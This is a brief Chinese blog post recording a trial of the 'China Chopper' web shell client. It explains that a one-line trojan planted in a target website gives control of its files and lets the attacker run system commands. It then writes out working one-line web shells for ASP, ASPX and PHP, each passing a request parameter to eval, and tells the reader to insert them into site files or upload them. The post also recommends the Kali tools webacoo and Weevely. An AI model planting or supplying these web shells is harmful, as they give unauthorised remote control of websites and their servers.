2018-11-08 中國菜刀小試記錄(windows環境)

weixin_34127717發表於2018-11-08

一. 簡介:

往目標網站中加入一句話木馬,然後你就可以在本地通過中國菜刀chopper.exe即可獲取和控制整個網站目錄並可執行一些web賬號所有許可權的系統命令,進入後滲透階段。

傳說中的官方網站:http://maicaidao.co/   。下載的時候發現是2014年的版本。。。

測試完官方的中國菜刀後,從Cracer的Cracer安全工具包v7版中拿了一個相對較新的,但是發現百度上找到的菜刀都有後門,並且中國菜刀的這些一句話木馬很容易就被防毒軟體查殺了,所以推薦兩款更好的kali下的工具:webacoo、Weevely 。

二. 記錄:

asp的一句話是: <%eval request("xxx")%>

aspx的一句話是:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

php的一句話是:<?php @eval($_POST['xxx']);?>

我們可以直接將這些語句插入到網站上的某個asp/aspx/php檔案上,或者直接建立一個新的檔案,在裡面寫入這些語句,然後把檔案上傳到網站上即可。

使用起來非常簡單,如下圖:

12321111-05ae63f3b56173e8

相關文章